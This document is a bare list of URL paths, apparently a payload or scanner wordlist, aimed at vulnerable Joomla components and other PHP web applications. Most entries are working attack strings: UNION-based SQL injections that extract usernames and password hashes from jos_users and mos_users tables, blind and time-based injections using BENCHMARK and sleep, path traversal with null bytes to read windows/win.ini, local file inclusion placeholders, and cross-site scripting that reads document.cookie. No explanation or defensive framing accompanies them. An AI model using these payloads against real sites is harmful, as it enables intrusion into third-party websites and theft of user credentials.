index.php?option=com_myalbum&album=[SQL]
index.php?option=com_myblog&Itemid=12&task=..
index.php?option=com_myblog&Itemid=12&task=[LFI]
index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users
index.php?option=com_myfiles&controller=..
index.php?option=com_myfiles&controller=[LFI]
index.php?option=com_mygallery&amp;func=viewcategory&amp;cid=-1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12--
index.php?option=com_mygallery&amp;func=viewcategory&amp;cid=-1+union+all+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15+from+jos_users
index.php?option=com_mygallery&amp;func=viewcategory&amp;cid=-1+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users 
index.php?option=com_mygallery&amp;func=viewcategory&amp;cid=-9999999
index.php?option=com_mygallery&func=viewcategory&cid=-1+union+all+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15+from+jos_users
index.php?option=com_mygallery&func=viewcategory&cid=-1+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users
index.php?option=com_myhome&task=4&nidimm=[BSQLi]
index.php?option=com_neorecruit&task=offer_view&id=155&Itemid=[Bsqli]
index.php?option=com_neorecruit&task=offer_view&id=[SQLi]
index.php?option=com_neorecruit&task=offer_view&id=[SQL Inject]
index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users--
index.php?option=com_netinvoice&action=orders&task=order&cid={SQL}
index.php?option=com_network&act=customer&task=details&cid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
index.php?option=com_network&act=customer&task=details&cid=[SQL]
index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0
index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
index.php?option=com_news_portal&controller=..
index.php?option=com_news_portal&controller=[LFI]
index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
index.php?option=com_nicetalk&tagid=[SQL Inject]
index.php?option=com_ninjacentral&page=show_package&id=56&Itemid=245 
index.php?option=com_ninjacentral&page=show_package&id=74&Itemid=236
index.php?option=com_ninjamonials&task=display&testimID=3+and+1=2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+jos_users
index.php?option=com_ninjamonials&task=display&testimID=n<sql Code>
index.php?option=com_ninjamonials&view=display&Itemid=[Bsqli]
index.php?option=com_ninjarsssyndicator&controller=..
index.php?option=com_noticeboard&controller=..
index.php?option=com_noticeboard&controller=[LFI]
index.php?option=com_obsuggest&controller=[LFI]%00
index.php?option=com_omphotogallery&controller= [-LFI-]
index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
index.php?option=com_ongallery&task=ft&id=-1[SQL] 
index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- 
index.php?option=com_onlineexam&controller=..
index.php?option=com_onlineexam&controller=[LFI]
index.php?option=com_ops&view=location&location_id=-1+UNION+SELECT+1,2,3,4,5--
index.php?option=com_ops&view=location&location_id=[SQL]
index.php?option=com_orgchart&controller=..
index.php?option=com_orgchart&controller=[LFI]
index.php?option=com_org&letter=')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f&task=indexs
index.php?option=com_org&task=info&id=22' <=[SQLI] --&#9001;=en
index.php?option=com_org&task=info&id=-22 UNION SELECT 1,2 ..... --&#9001;=en
index.php?option=com_otzivi&Itemid=15+and+1=2+union+select+concat(id,0x3a,username,0x3a,password),1+from+jos_users7,8,concat(username,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
index.php?option=com_oziogallery&Itemid=[SQL]
index.php?option=com_packages&func=detail&Itemid=86&id=-1
index.php?option=com_packages&func=detail&Itemid=86&id=[SQL]
index.php?option=com_party&view=party&task=details&id=-1
index.php?option=com_party&view=party&task=details&id=[SQL]
index.php?option=com_paxgallery&task=table&gid=1"
index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100
index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]
index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5  [Ye$]
index.php?option=com_paxxgallery&Itemid=46&task=view&gid=7
index.php?option=com_paxxgallery&Itemid=85&gid=7&userid= EXPLOİT
index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_pcchess&controller=..
index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1"
index.php?option=com_pc&controller= [LFI]
index.php?option=com_people&controller=..
index.php?option=com_people&controller=people&task=details&id=-1 UNION SELECT username,password,3 FROM jos_users
index.php?option=com_perchagallery&view=editunidad&id=[EXPLOIT]
index.php?option=com_personal&pid=56&id=-1 UNION SELECT 1,2,3,4
index.php?option=com_personal&pid=56&id=[SQL]
index.php?option=com_phocagallery&view=categories&Itemid=[SQL Injection] 
index.php?option=com_photobattle&view=..
index.php?option=com_photobattle&view=[LFI]
index.php?option=com_photoblog&view=blogs&category=-666
index.php?option=com_photoblog&view=blogs&category=[INDONESIANCODER]
index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and> substring(@@version,1,1)=5
index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_php&file=..
index.php?option=com_php&Itemid=70&id=131+and+1=1 
index.php?option=com_php&Itemid=70&id=131+and+1=2
index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=57
index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=58
index.php?option=com_php&Itemid=x&id=y<Sql Code>
index.php?option=com_picasa2gallery&controller=..
index.php?option=com_picasa2gallery&controller=[INDONESIANCODER]
index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=..
index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]
index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,password,8,9,10%20from%20jos_users--
index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,username,8,9,10%20from%20jos_users--
index.php?option=com_ponygallery&Itemid=[sqli]
index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL Inject]
index.php?option=com_portafolio&task=viewcat&cid=-null+and+1=2+union+select+1,2,3,4,5,6,7,user(),9--&Itemid=5
index.php?option=com_portafolio&task=viewcat&cid=<sql Code>
index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users
index.php?option=com_powermail&controller=..
index.php?option=com_powermail&controller=[LFI]
index.php?option=com_press&task=view_details&id=-1+UNION+SELECT+1,2,3,4,5,6,7--
index.php?option=com_press&task=view_details&id=[SQL]
index.php?option=com_preventive&controller==..
index.php?option=com_preventive&controller=[LFI]
index.php?option=com_prime&lang=..
index.php?option=com_pro_desk&include_file=..
index.php?option=com_productbook&Itemid=97&func=detail&id=-73+UNION all SELECT 1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users--
index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+jos_users&op=category_details
index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+mos_users&op=category_details
index.php?option=com_projectfork&section=  [-LFI-]
index.php?option=com_properties&controller=[LFI]%00
index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
index.php?option=com_properties&task=agentlisting&aid=[gubr4k]
index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users
index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26<Sql Code>
index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--
index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]
index.php?option=com_qcontacts&view=contact&id=1&Itemid=-541
index.php?option=com_qpersonel&task=qpListele&katid=1"
index.php?option=com_qpersonel&task=qpListele&katid=1\")"
index.php?option=com_quickfaq&view=category&cid=[Valid Cid]&Itemid= [BSQL-Injection] 
index.php?option=com_quicknews&task=view_item&newsid=33
index.php?option=com_quicknews&task=view_item&newsid=[INDONESIANCODER]
index.php?option=com_quran&action=viewayat&surano=-69
index.php?option=com_quran&action=viewayat&surano=[INDONESIANCODER]
index.php?option=com_races&task=result&raceId=272
index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,version(),5,6,7,8--
index.php?option=com_radio&task=exibi_descricao&id=[SQL]
index.php?option=com_ranking&view=detail&id=-1+UNION+SELECT+1,2,3--
index.php?option=com_ranking&view=detail&id=[SQL]
index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id={SQL}
index.php?option=com_realtyna&controller=..
index.php?option=com_realtyna&controller=[FRIBO]
index.php?option=com_realtyna&controller=[LFI]
index.php?option=com_recly&task=product_page&id=1
index.php?option=com_recly&task=product_page&id=12
index.php?option=com_recly&task=product_page&id=2
index.php?option=com_record&controller=..
index.php?option=com_record&controller=[LFI]
index.php?option=com_redshop&view=..
index.php?option=com_redshop&view=[LFI]
index.php?option=com_redshop&view=product&pid=[SQLi]
index.php?option=com_redtwitter&view=..
index.php?option=com_redtwitter&view=[LFI]
index.php?option=com_rekry&Itemid=60&rekryview=view&op_id=-1
index.php?option=com_rekry&Itemid=xX&rekryview=view&op_id=[SQL]
index.php?option=com_remository&func=selectcat&cat=[SQL]
index.php?option=com_remository&Itemid=193&func=startdown&id=1
index.php?option=com_remository&Itemid=27&func=fileinfo&parent=category&filecatid=1054
index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]
index.php?option=com_remository&Itemid=6&func=fileinfo&id=6&#9001;=en
index.php?option=com_remository&Itemid=6&func=select&id=2&orderby=3&#9001;=en
index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9
index.php?option=com_remository&Itemid=[Itemid]&func=addfile
index.php?option=com_rokdownloads&view=file&task=download&id=23%3Ajs-jobs&Itemid=4
index.php?option=com_rokdownloads&view=file&task=download&id=23:js-jobs
index.php?option=com_rokdownloads&view=file&task=download&id=31%3Acomponent-v-0-9&Itemid=3
index.php?option=com_rokdownloads&view=folder&Itemid=198&id=4%3Aal-furqan-1-5
index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]
index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]
index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=4 << false
index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 << true
index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=[BSQLi]
index.php?option=com_route&kid=-35022+  #
index.php?option=com_rpx&controller=..
index.php?option=com_rsfiles&task=files.display&path=[File]
index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users--
index.php?option=com_rsmonials and post a comment.
index.php?option=com_rwcards&controller=..
index.php?option=com_rwcards&controller=[LFI]
index.php?option=com_rwcards&view=rwcards&controller=..
index.php?option=com_rwcards&view=rwcards&controller=[LFI]
index.php?option=com_s5clanroster&controller=..
index.php?option=com_s5clanroster&controller=[LFI]
index.php?option=com_s5clanroster&view=..
index.php?option=com_s5clanroster&view=[LFI]
index.php?option=com_sbsfile&controller=..
index.php?option=com_sbsfile&controller=[LFI]
index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users
index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>
index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
index.php?option=com_science&view=science&id=-1 UNION SELECT 1,2,3,4,5
index.php?option=com_science&view=science&id=[SQL]
index.php?option=com_searchlog&act=log
index.php?option=com_sebercart&view=..
index.php?option=com_sebercart&view=[LFI]
index.php?option=com_sef&controller=
index.php?option=com_sef&controller=[LFI]%00
index.php?option=com_serie&Itemid=126&menu=show_spieler&spielerid=-1+UNION+SELECT+1,2,3,4,5,6--
index.php?option=com_serie&Itemid=126&menu=show_spieler&spielerid=[SQL]
index.php?option=com_sermonspeaker&task=latest_sermons&id=
index.php?option=com_sermonspeaker&task=latest_sermons&id=[SQL]
index.php?option=com_seyret&view=[LFI]%00
index.php?option=com_shoutbox&controller=..
index.php?option=com_shoutbox&controller=[LFI]
index.php?option=com_siirler&task=sdetay&sid=364+and+1=2+union+select+concat(username,char(58),password)+from+jos_users--
index.php?option=com_siirler&task=sdetay&sid=[xxx]+and+1=2+union+select+concat(username,char(58),password)+from+jos_users--
index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users
index.php?option=com_simpledownload&controller=..
index.php?option=com_simpledownload&controller=[LFI BY ARUMBIA]
index.php?option=com_simpledownload&task=download&fileid=
index.php?option=com_simpledownload&task=download&fileid=[file]
index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False
index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True
index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1
index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
index.php?option=com_simpleshop&task=browse&Itemid=29&catid={SQL}
index.php?option=com_sim&task=viewchar&character_ID=1"
index.php?option=com_smartsite&controller=..
index.php?option=com_smartsite&controller=[LFI]
index.php?option=com_smestorage&controller=[LFI]%00
index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+0,concat(username,0x3a3a,password),0+from+jos_users--
index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+1,concat(username,0x3a3a,password),3+from+jos_users-- 
index.php?option=com_socialads&view=adsummary&Itemid=94&adid=23
index.php?option=com_socialads&view=showad&Itemid=94
index.php?option=com_software&task=viewDetail&software_id=-1+UNION+SELECT+1--
index.php?option=com_software&task=viewDetail&software_id=[SQL]
index.php?option=com_solution&Itemid=5&task=contry&con=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
index.php?option=com_solution&Itemid=5&task=contry&con=[SQL]
index.php?option=com_soundset&controller=showcategory&cat_id=-666+union+select+1,2,concat_ws(0x3a,username,password)kaMtiEz,4,5+from+jos_users--
index.php?option=com_spa&view=spa_product&cid=-1+union+select concat(username,0x3a,password)+from+jos_users
index.php?option=com_spa&view=spa_product&cid=-20+union+select+concat(username,0x3a,password)+from+jos_users
index.php?option=com_spa&view=spa_product&cid=[SQL]
index.php?option=com_spa&view=spa_read_more&pid=-35%20UNION%20SELECT%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13%20from%20jos_users--
index.php?option=com_spa&view=spa_read_more&pid=-35UNION
index.php?option=com_spa&view=spa_read_more&pid=[SQL]
index.php?option=com_spec&view=spec&tmpl=component&pro_id=-1+UNION+SELECT+1,2--
index.php?option=com_spec&view=spec&tmpl=component&pro_id=-1+UNION+SELECT+@@version,2--
index.php?option=com_spec&view=spec&tmpl=component&pro_id=[SQL]
index.php?option=com_spidercatalog&product_id=-1%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%28version%28%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&view=showproduct&page_num=1&back=1
index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spsnewsletter&controller=..
index.php?option=com_spsnewsletter&controller=[LFI]
index.php?option=com_start&task=main&mitID=-1
index.php?option=com_start&task=main&mitID=[SQL]
index.php?option=com_staticxt&staticfile=test1.php&id=-79+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
index.php?option=com_staticxt&staticfile=test.php&id=1923[SQL]
index.php?option=com_staticxt&staticfile=test.php&id=-1923+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
index.php?option=com_svmap&controller=..
index.php?option=com_svmap&controller=[LFI]
index.php?option=com_sweetykeeper&controller=..
index.php?option=com_sweetykeeper&controller=[LFI]
index.php?option=com_tariff&detail=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11
index.php?option=com_tariff&detail=[SQL]
index.php?option=com_teacher&view=teacher&id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
index.php?option=com_teacher&view=teacher&id=[SQL]
index.php?option=com_tech_article&Itemid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from+jos_users--&task=item
index.php?option=com_television&view=television&id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
index.php?option=com_television&view=television&id=-1 UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16--
index.php?option=com_television&view=television&id=[SQL]
index.php?option=com_thyme&calendar=1&category=0&d=25&m=10&y=2008&Itemid=67&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users
index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users
index.php?option=com_ticketbook&controller=..
index.php?option=com_ticketbook&controller=[LFI]
index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users
index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users
index.php?option=com_tickets&task=form&id=n[SQL code]
index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
index.php?option=com_timereturns&view=timereturns&id=[num]
index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=4   -->FALSE
index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=5   -->TRUE
index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=4 > ( FALSE )
index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=5 > ( TRUE )
index.php?option=com_tophotelmodule&task=showhoteldetails&id=[SQL-vulnerability]
index.php?option=com_topmenu&id=-1 UNION SELECT 1,2,3,4
index.php?option=com_topmenu&id=[SQL]
index.php?option=com_tour&view=cat&cid=-999+UNION+ALL+SELECT+1,2,3,4--
index.php?option=com_tour&view=cat&cid=[SQL]
index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=0
index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=1
index.php?option=com_trading&task=showsharedetails&id=1+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
index.php?option=com_trading&task=showsharedetails&id=[Blind SQL]
index.php?option=com_travelbook&controller=..
index.php?option=com_travelbook&controller=[LFI]
index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17 FROM jos_users
index.php?option=com_tupinambis&task=verproyecto&proyecto=-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,9,10,11+from+jos_users--
index.php?option=com_tupinambis&task=verproyecto&proyecto=-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,9,10,11+from+mos_users--
index.php?option=com_tweetla&controller=..
index.php?option=com_tweetla&controller=[LFI]
index.php?option=com_ultimateportfolio&controller=..
index.php?option=com_ultimateportfolio&controller=[LFI]
index.php?option=com_units&task=unit&id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
index.php?option=com_units&task=unit&id=[SQL]
index.php?option=com_user&amp;task=requestreset";
index.php?option=com_userstatus&controller=..
index.php?option=com_users&view=registration
index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility:hidden;" onload="read()"><
index.php?option=com_user&view=login
index.php?option=com_user&view=reset&layout=complete";
index.php?option=com_user&view=reset&tmpl=component";
index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users--
index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users
index.php?option=com_virtuemart&Itemid=91&category_id=28&flypage=flypage.tpl&#9001;=en&page=shop.product_details&product_id=79&vmcchk=1&Itemid=91
index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=16%22%20and%20sleep(10)%20and%20%22%22%3D%22
index.php?option=com_vjdeo&controller=..
index.php?option=com_vjdeo&controller=[LFI]
index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1
index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit]
index.php?option=com_vxdate&ct=
index.php?option=com_vxdate&ct=1&md=details&id=
index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5
index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C
index.php?option=com_vxdate&ct=1&md=editform&id=
index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5
index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C
index.php?option=com_wallpapers&act=albums&cid=[SQL]
index.php?option=com_waticketsystem&act=category&catid=1"
index.php?option=com_webeecomment&controller=..
index.php?option=com_webeecomment&controller=[LFI]
index.php?option=com_weberpcustomer&controller=..
index.php?option=com_webtv&controller=..
index.php?option=com_webtv&controller=[LFI]
index.php?option=com_wgpicasa&controller=..
index.php?option=com_wgpicasa&controller=[LFI]
index.php?option=com_wisroyq&controller=..
index.php?option=com_wisroyq&controller=[LFI]
index.php?option=com_wmi&controller=..
index.php?option=com_wmi&controller=[LFI]
index.php?option=com_wmtpic&Itemid=[] <== SQL-i
index.php?option=com_worldrates&controller=..
index.php?option=com_worldrates&controller=[LFI]
index.php?option=com_xobbix&catid=31&task=prod_desc&prodid=-21+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
index.php?option=com_xobbix&catid=32&task=prod_desc&prodid=25
index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--
index.php?option=com_ybggal&Itemid=[xxx]&catid=[SQLi]
index.php?option=com_yellowpages&cat=1923[SQL]
index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-1+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a3a3a,username,password),5,6,concat_ws(0x3a3a3a,username,password),8,9,10,11,12,13,14,15,16,17+FROM+jos_users--
index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=[SQL]
index.php?option=com_yjcontactus&view=..
index.php?option=com_yjcontactus&view=[LFI]
index.php?option=com_youtube&id_cate=4 
index.php?option=com_youtube&id_cate=55
index.php?option=com_zcalendar&task=view&vmode=e&eid=236 and 1=0
index.php?option=com_zcalendar&task=view&vmode=e&eid=236 and 1=1
index.php?option=com_zimbcomment&controller=..
index.php?option=com_zimbcomment&controller=[LFI]
index.php?option=com_zimbcore&controller=..
index.php?option=com_zimbcore&controller=[LFI]
index.php?option=com_zina&view=zina&Itemid=9[SQLi CODE]
index.php?option=com_zoom&Itemid=0&catid=21
index.php?option=com_zoom&Itemid=0&catid=[SQLi]           
index.php?option=com_zoom&Itemid=39&catid=2+OR+1=1 
index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]
index.php?option=configuration&suboption=alerts&modoption=edit_alert
index.php?option=configuration&suboption=alerts&modoption=edit_alert&alert=2
index.php?option=configuration&suboption=configuration&modoption=edit_css&theme=..%2Findex.php%00
index.php?option=configuration&suboption=users&modoption=save_user&user_id=">
index.php?option=content&task=category&sectionid=[VID]&id=[SQL]&Itemid=[VID]
index.php?option=content&task=new&Itemid=[id]
index.php?option=content&task=view&id=1&Itemid="><script>alert(document.domain);<
index.php?option=content&task=view&id=[SQL]&Itemid=[VID]
index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
index.php?option=modulemanager&module=16&modoption=edit_article&cat_id=1&article_id=0&template=..
index.php?option=modulemanager&module=17&modoption=edit_newsletter&newsletter_id=1&edition=1&template=..
index.php?option=news&aktion=komm&ID=-1
index.php?option=news&aktion=komm&ID=-SQL Inj.-
index.php?option=SaveConfig',$write);
index.php?option=search&searchword=<script>alert(document.cookie);<
index.php?option=[SQL Injection]
index.php?option=viewEntry&filename=..
index.php?option=viewEntry&filename=00001
index.php?op=topic&quale=[abducter]
index.php?op=userinfo&nick=<script language=javascript>window.alert(document.cookie);<
index.php?op=ViewAlbum&albumId=-1
index.php?op=viewarticle&artid=9%2c+9%2c+9 
index.php?op=vis_reg&usr="><script>alert('LOL%20%20')<
index.php?order=sev&project=1&tasks=&type=
 index.php or whatever
index.php?o='[SQL INJECTION]
index.php?otherTemplate=
index.php?owner=[SQL Injection]
index.php?oxynews_comment_id=[sql]
index.php?p=
index.php?p=..
index.php?p='
index.php?p=39
index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
index.php?p=8
index.php?pa=Adsview&cid=[exploit]
